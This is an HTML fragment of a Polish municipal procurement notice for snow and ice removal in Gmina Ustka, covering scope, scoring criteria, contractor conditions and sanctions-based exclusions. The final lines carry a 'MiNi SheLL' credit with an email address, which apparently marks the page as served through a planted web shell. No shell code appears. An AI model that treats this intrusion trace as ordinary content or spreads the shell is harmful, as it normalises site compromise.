class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas podstawienia pojazdu zastępczego w przypadku wystąpienia awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> część VIII rejon nr 16 – sołectwo Wytowno (części składowe: Wytowno, Dalimierz Przewłocki), rejon nr 18 – sołectwo<br/>Machowinko (części składowe: Machowinko, Poddąbie, Redwanki).<br/>Zakres zamówienia obejmuje usługę mechanicznego usuwania śniegu oraz usuwania śliskości (piaskiem, mieszanką piasku<br/>i soli 3:1) po stwierdzeniu mżawki, lodowicy, gołoledzi, szadzi, szronu, śliskości pośniegowej.<br/>Wykonawca w celu realizacji przedmiotu umowy zobowiązany jest do;<br/>1) prowadzenia całodobowych obserwacji zjawisk atmosferycznych mających wpływ na stan nawierzchni dróg, chodników i<br/>ciągów pieszo-jezdnych oraz mają wpływ na samodzielne podjęcie działań,<br/>2) samodzielne przystąpienia do odśnieżania nawierzchni dróg, chodników, ciągów pieszo – jezdnych na terenie Gminy<br/>Ustka (zgodnie z załącznikiem graficznym) po stwierdzeniu warstwy zalegania śniegu o grubości powyżej 5 cm, w czasie do<br/>dwóch godzin od ustania opadów śniegu lub po wystąpieniu śliskości nawierzchni – bez dodatkowego zlecenia usług;<br/>jednakże Zamawiający ma prawo wstrzymać prace Wykonawcy w ciągu 15 min od otrzymania od niego wiadomości o<br/>planowanym przystąpieniu do prac;<br/>3) informowania każdorazowo Zamawiającego o rozpoczęciu i zakończeniu czynności wskazanych w pkt 2) - wiadomością<br/>SMS na numer tel…...(zostanie podany w dniu podpisania umowy);<br/>4) zapewnienia stałej łączności telefonicznej z upoważnionym pracownikiem Urzędu Gminy Ustka oraz z Sołtysem lub<br/>Radnym danej miejscowości;<br/>5) do uprzątnięcia i wywozu nadmiaru pozostałego piasku z dróg, chodników i ciągów pieszo-jezdnych swojej części<br/>przedmiotu zamówienia.<br/>Podstawą do rozliczenia będą zliczone długości wykonanych odcinków dróg, chodników i ciągów pieszo-jezdnych oraz<br/>kontrolne wydruki z przekazanych Wykonawcy przez Zamawiającego urządzeń GPS potwierdzające wykonanie usługi.<br/>Zamawiający może zlecić Wykonawcy wykonanie dodatkowych usług i przystąpienie do ich realizacji powinno nastąpić<br/>niezwłocznie jednak nie później niż przed upływem 2 godzin po otrzymaniu telefonicznego zlecenia od Sołtysa lub Radnego<br/>miejscowości wskazanej w § 1 ust. 1 umowy lub upoważnionego pracownika Urzędu Gminy Ustka, które może byćprzekazane w ciągu całej doby.<br/>Wykonawca ubiegający się o zamówienie powinien dysponować:<br/>- pojazdem z pługiem śnieżnym do mechanicznego usuwania śniegu z nawierzchni dróg, ciągów pieszo – jezdnych,<br/>- pojazdem z pługiem śnieżnym do mechanicznego usuwania śniegu z nawierzchni chodników o masie całkowitej do 2,5 Mg,<br/>- pojazdem ze sprzętem do usuwania śliskości (sypanie piachem i mieszanką piachu i soli 3:1),<br/>Pojazdy muszą mieć możliwość podłączenia przekazanego przez Zamawiającego urządzenia GPS do gniazda zapalniczki.<br/>Przez pojazd należy rozumieć pojazd o napędzie spalinowym, elektrycznym, hybrydowym (samochód ciężarowy, ciągnik,<br/>maszyna drogowa, koparka, koparko – ładowarka).<br/>Przez pług śnieżny należy rozumieć urządzenie składające się z odkładnicy, lemiesza i zawieszenia, montowane na nośniku<br/>pługa.<br/>Przez usuwanie śliskości należy rozumieć usunięcie z nawierzchni drogi lodu lub zlodowaciałego albo ubitego śniegu przy<br/>użyciu środków chemicznych, uszorstniających lub mechanicznych albo środków tych łącznie.<br/>Przez sprzęt do usuwania śliskości należy rozumieć rozsypywarki (piaskarki, solarki, piaskarko-solarki), dozujące i<br/>rozsypujące materiały, urządzenia współpracujące, np. ładowarki w składowiskach materiałów, zbiorniki solanki, itp.<br/>Zamawiający informuje, iż drogi o nawierzchni betonowej nie mogą być posypywane mieszanką piasku i soli a jedynie<br/>piaskiem. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą<br/>„spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach i oświadczeniach, o których mowa w rozdziale 17 SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas podstawienia pojazdu zastępczego w przypadku wystąpienia awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w pkt. 14 SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu (art. 266 w zw. z art. 112 ustawy PZP).<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia warunku w powyższym zakresie;<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie stawia warunku w powyższym zakresie.;<br/>3) sytuacji ekonomicznej lub finansowej: Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej: warunek zostanie uznany za spełniony, jeżeli<br/>Wykonawca wykaże, że: <br/>dot. części I, II, III, IV, V, VI, VII, VIII<br/>1) celem realizacji przedmiotu zamówienia dysponuje lub będzie dysponował niżej wymienionym sprzętem: <br/>- pojazdem z pługiem śnieżnym do mechanicznego usuwania śniegu z nawierzchni dróg, ciągów pieszo – jezdnych,<br/>- pojazdem z pługiem śnieżnym do mechanicznego usuwania śniegu z nawierzchni chodników o masie całkowitej do 2,5 Mg, <br/>- pojazdem ze sprzętem do usuwania śliskości (sypanie piachem i mieszanką piachu i soli 3:1),<br/>Pojazdy muszą mieć możliwość podłączenia przekazanego przez Zamawiającego urządzenia GPS do gniazda zapalniczki.<br/>Przez pojazd należy rozumieć pojazd o napędzie spalinowym, elektrycznym, hybrydowym (samochód ciężarowy, ciągnik, maszyna drogowa, koparka, koparko – ładowarka).<br/>Przez pług śnieżny należy rozumieć urządzenie składające się z odkładnicy, lemiesza i zawieszenia, montowane na nośniku pługa. <br/>Przez usuwanie śliskości należy rozumieć usunięcie z nawierzchni drogi lodu lub zlodowaciałego albo ubitego śniegu przy użyciu środków chemicznych, uszorstniających lub mechanicznych albo środków tych łącznie.<br/>Przez sprzęt do usuwania śliskości należy rozumieć rozsypywarki (piaskarki, solarki, piaskarko-solarki), dozujące i rozsypujące materiały, urządzenia współpracujące, np. ładowarki w składowiskach materiałów, zbiorniki solanki, itp. Zamawiający informuje, iż drogi o nawierzchni betonowej nie mogą być posypywane mieszanką piasku i soli a jedynie piaskiem. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 1616), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - załącznik nr 6.<br/>2) oświadczenie o niepodleganiu wykluczeniu na podstawie art. 108 ust. 1 pkt 1 – 6 oraz art. 109 ust. 1 pkt 4 ustawy Pzp– załącznik nr 3 do SWZ składany wraz z Oferta.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">oświadczenie dotyczące spełnienia warunków udziału w postępowaniu na podstawie art. 125 ust. 1 ustawy Pzp w związku z art. 273 ust. 1 i ust. 2 ustawy Pzp – załącznik nr 2 do SWZ składany wraz z Oferta;</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty stanowiące ofertę, które należy złożyć:<br/>1) Formularz ofertowy - interaktywny formularz Ofertowy do pobrania na platformie ezamówienia wraz z formularzem<br/>cenowym stanowiącym załącznik 1A formularz cenowy do SWZ<br/>2) OŚWIADCZENIA [art. 273 ust. 1 i ust. 2 w zw. z art. 125 ust 1 ustawy pzp].<br/>a) oświadczenie o spełnianiu warunków udziału w postępowaniu składane na podstawie art. 125 ust. 1 ustawy Pzp w<br/>związku z art. 273 ust. 1 i ust. 2 ustawy Pzp - którego wzór stanowiące załącznik nr 2 do SWZ - w przypadku wspólnego<br/>ubiegania się o zamówienie przez wykonawców, oświadczenie o spełnieniu warunków udziału w postępowaniu składa ich<br/>pełnomocnik wykonawców lub każdy z wykonawców;<br/>b) oświadczenie o niepodleganiu wykluczeniu na podstawie art. 108 ust. 1 pkt 1 – 6 oraz art. 109 ust. 1 pkt 4 ustawy pzp -<br/>którego wzór stanowi załącznik nr 3 do SWZ - w przypadku wspólnego ubiegania się o zamówienie przez wykonawców,<br/>oświadczenie o niepodleganiu wykluczenia składa każdy z wykonawców;<br/>c) Wykonawca, w przypadku polegania na zdolnościach podmiotów udostępniających zasoby, przedstawia, wraz z<br/>oświadczeniem, o którym mowa lit a) i lit. b), także oświadczenie podmiotu udostępniającego, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim<br/>wykonawca powołuje się na jego zasoby [art. 266, art. 273 ust. 1 w zw z art. 125 ust 5 ustawy pzp] - odpowiednio załącznik<br/>nr 4 oraz 5 do SWZ;<br/>d) Zgodnie z art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2024 r. poz. 507)<br/>Zamawiający wykluczy z udziału w postępowaniu (treść oświadczenia została zawarta w załączniku nr 3 oraz 5 do SWZ).<br/>3) Pełnomocnictwo upoważniające do złożenia oferty, jeżeli ofertę składa pełnomocnik;<br/>4) Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia – dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>5) Zobowiązanie podmiotu udostępniającego zasoby [art. 118 ust. 3 ustawy pzp].<br/>Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z ofertą,<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, ze wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów.<br/>Uwaga: Dokument ma być złożony wraz z ofertą tylko w sytuacji gdy wykonawca powołuje się na zasoby innego podmiotu. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Żaden z Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia nie może podlegać wykluczeniu z postępowania.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający zgodnie z art. 455 ust. 1 pkt 1 ustawy PZP przewiduje możliwość wprowadzenia istotnych zmian do treści<br/>zawartej umowy w następującym zakresie:<br/>Strony przewidują zmiany wynagrodzenia w wypadku wystąpienia jednej ze zmian przepisów wskazanych w art. 436 pkt 4<br/>lit. b tiret 1 ustawy z dnia 11 września 2019 r. Prawo Zamówień Publicznych, tj. zmiany stawki podatku od towarów i usług. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-02 08:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-02 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-12-31</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zgodnie z art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2024 r. poz. 507 ze zm.)<br/>Zamawiający wykluczy z udziału w postępowaniu (treść oświadczenia została zawarta w załączniku nr 2 oraz 3 do SWZ):<br/>1) wykonawcę wymienionego w wykazach określonych w rozporządzeniu 765/2006 z dnia 18 maja 2006 r. dotyczącego<br/>środków ograniczających w związku z sytuacją na Białorusi i udziałem Białorusi w agresji Rosji wobec Ukrainy (Dz. Urz. UE<br/>L 134 z 20.05.2006, str. 1, z późn. zm. 3) i rozporządzeniu 269/2014 z dnia 17 marca 2014 r. w sprawie środków<br/>ograniczających w odniesieniu do działań podważających integralność terytorialną, suwerenność i niezależność Ukrainy lub<br/>im zagrażających (Dz. Urz. UE L 78 z 17.03.2014, str. 6, z późn. zm.4), albo wpisanego na listę na podstawie decyzji w<br/>sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>2) wykonawcę którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu<br/>pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2023 r. poz. 1124 ze zm.) jest osoba wymieniona w wykazach<br/>określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem<br/>rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę<br/>rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>3) wykonawcę, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o<br/>rachunkowości (Dz. U. z 2023 r. poz. 120 ze zm.) jest podmiot wymieniony w wykazach określonych w rozporządzeniu<br/>765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r.,<br/>o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym<br/>mowa w art. 1 pkt 3.<br/>Wykluczenie następuje na okres trwania powyższych okoliczności.

Creat By MiNi SheLL
Email: jattceo@gmail.com